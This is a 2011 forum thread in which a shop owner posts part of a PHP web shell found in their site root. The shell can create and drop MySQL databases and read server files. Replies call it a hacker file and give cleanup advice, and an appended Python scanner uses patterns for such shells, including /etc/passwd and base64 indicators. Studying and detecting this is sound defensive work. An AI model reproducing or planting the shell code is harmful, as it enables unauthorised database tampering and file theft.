    print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td><td>$row[4]</td><td>$row[5]</td><td>$row[6]</td><td>$row[7]</td></tr>";
  }
  print "</table><br>";
  mysql_free_result($result);
  unset($proc);
}
/* create a new database */
if (isset($HTTP_GET_VARS['new_db'])){
  $new_db=trim($HTTP_GET_VARS['new_db']);
  if (mysql_create_db ($new_db)) {
    print ("<center><font size=2>¡‡Á‡ <b>$new_db</b> ÛÒÔ¯ÌÓ ÒÓÁ‰‡Ì‡</font></center><br>");
    print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
  } else {
    print "$h_error".mysql_error()."$f_error <head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
  }
  unset($new_db);
}
/* drop a database */
if (isset($HTTP_GET_VARS['drop'])){
  $result_d = mysql_list_dbs($connection) or die("<td bgcolor=#DAD9D9>$h_error".mysql_error()."$f_error</td></tr></table>");
  while ( $row_d=mysql_fetch_row($result_d) ){
    if ($drop==$row_d[0]) $dr="TRUE";
  }
  if ($dr="TRUE") {
    mysql_drop_db($drop,$connection);
    print ("<center><font size=2>¡‡Á‡ <b>$drop</b> ÛÒÔ¯ÌÓ Û‰‡ÎÂ̇</font></center><br>");
    print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
  }
  unset($drop);
}
/*------------- read an arbitrary file from the server -----------*/
if (isset($f)){
  print $form_file;
}
...........removed long code............
</table> </td></tr> <tr><td> <table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td align=center> free script ©RusH Security Team </td> </tr> </table> </td></tr> </table> </td></tr></table>";
?>
Guest Posted March 31, 2011

John,

It is a hacker file. Delete it.

Chris
ttmw (author) Posted March 31, 2011

John, It is a hacker file. Delete it. Chris

I deleted it as soon as I found it, thankfully! I don't understand how it managed to get there though? How do they do it?! On my root folder! I had a recent hack with permissions on 777, but I wouldn't know where to start with finding the cause of this one. :(
Taipo Posted March 31, 2011

That shell code above seems quite focussed on database access, so best you take some time to take a look at your database as well. There will also be other files on your site that have had scripts injected into them that allow for files to be uploaded. These can take many forms, so if you get a chance have a read of the two discussions in my signature which cover what some of those methods are, and how in some situations, file and directory permissions are of no consequence to preventing this type of intrusion.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
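A first-pass triage for the situation Taipo describes (other files on the site with injected scripts), written as an added example for this thread; it is not code from the forum, from osCommerce or from osC_Sec. It scores every PHP file under a web root against behaviours the sql.php shell quoted in the first post shows (error suppression, the register_globals shim, MySQL credentials taken straight from request variables, /etc/passwd and my.ini as default targets, base64-encoded payloads, dumps written to /tmp, a call-home readfile), and separately lists files modified after a known-good deployment time. The indicator names, the three-hit threshold, all file contents and paths, and the deployment timestamp are this example's own constructed choices.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators drawn from what the quoted sql.php does. Names and the threshold
# below are this example's own choices, not a published rule set.
INDICATORS = {
    "silences_errors":         re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "unlimited_runtime":       re.compile(r"set_time_limit\s*\(\s*0\s*\)"),
    "register_globals_shim":   re.compile(r"import_request_variables\s*\("),
    "db_login_from_request":   re.compile(r"mysql_connect\s*\(\s*\$server\b"),
    "targets_passwd_or_myini": re.compile(r"/etc/passwd|my\.ini"),
    "embedded_base64":         re.compile(r"base64_decode\s*\("),
    "dynamic_code":            re.compile(r"create_function\s*\(|\beval\s*\("),
    "dumps_to_tmp":            re.compile(r"/tmp/dump_|C:\\\\tmp"),
    "phones_home":             re.compile(r"readfile\s*\(\s*[\"']https?://"),
}
MIN_HITS = 3  # one indicator is common in real code; three together is not


def scan_source(src):
    """Names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_tree(root, min_hits=MIN_HITS):
    """(relative path, hits) for each PHP file under root that reaches the
    threshold, most suspicious first. Files are read as latin-1 so the
    mis-encoded comments seen in the posted shell cannot abort the scan."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        try:
            hits = scan_source(path.read_text(encoding="latin-1"))
        except OSError:
            continue
        if len(hits) >= min_hits:
            findings.append((path.relative_to(root).as_posix(), hits))
    findings.sort(key=lambda f: -len(f[1]))
    return findings


def files_newer_than(root, since):
    """Relative paths of files whose mtime is after `since` (epoch seconds),
    e.g. the last clean deployment. mtimes can be forged, so use this to
    prioritise review, never to clear a file."""
    root = Path(root)
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file() and p.stat().st_mtime > since
    )


# Constructed sample web root. "sql.php" repeats only a few opening lines of
# the quoted shell (not a working tool); the other two files mimic ordinary
# osCommerce code and must not be flagged.
SAMPLE_FILES = {
    "sql.php": (
        '<?php error_reporting(0); @set_time_limit(0);\n'
        'if(!ini_get("register_globals")){ import_request_variables("GPC"); }\n'
        '$file = "/tmp/dump_".$db.".sql"; $p_v = "/etc/passwd";\n'
        '$connection = mysql_connect($server.":".$port, $login, $passwd);\n'
        'echo base64_decode($bg_f);\n'
    ),
    "includes/configure.php": (
        "<?php\n"
        "define('DB_SERVER', 'localhost');\n"
        "define('DB_SERVER_USERNAME', 'shop');\n"
        "$link = mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD);\n"
    ),
    "index.php": "<?php require('includes/application_top.php'); ?>\n",
}


def build_sample_tree(base, deploy_time):
    """Write SAMPLE_FILES under base; legitimate files get the deployment
    mtime, the dropped shell keeps the current time."""
    base = Path(base)
    for rel, body in SAMPLE_FILES.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
        if rel != "sql.php":
            os.utime(target, (deploy_time, deploy_time))
    return base


def demo():
    """Run both checks on the constructed tree and return their results."""
    deploy_time = 1_300_000_000  # constructed: a timestamp before the intrusion
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp, deploy_time)
        suspicious = scan_tree(root)
        recent = files_newer_than(root, deploy_time)
    for rel, hits in suspicious:
        print(f"REVIEW {rel}: {', '.join(hits)}")
    print("modified since deployment:", recent)
    return suspicious, recent


if __name__ == "__main__":
    demo()
```

On a real site, point `scan_tree` and `files_newer_than` at the document root and treat both lists as a review queue: a file that scores high is worth opening, and a file that appears in neither list is not thereby clean, since injected code can be appended to an existing legitimate file and timestamps can be set to anything.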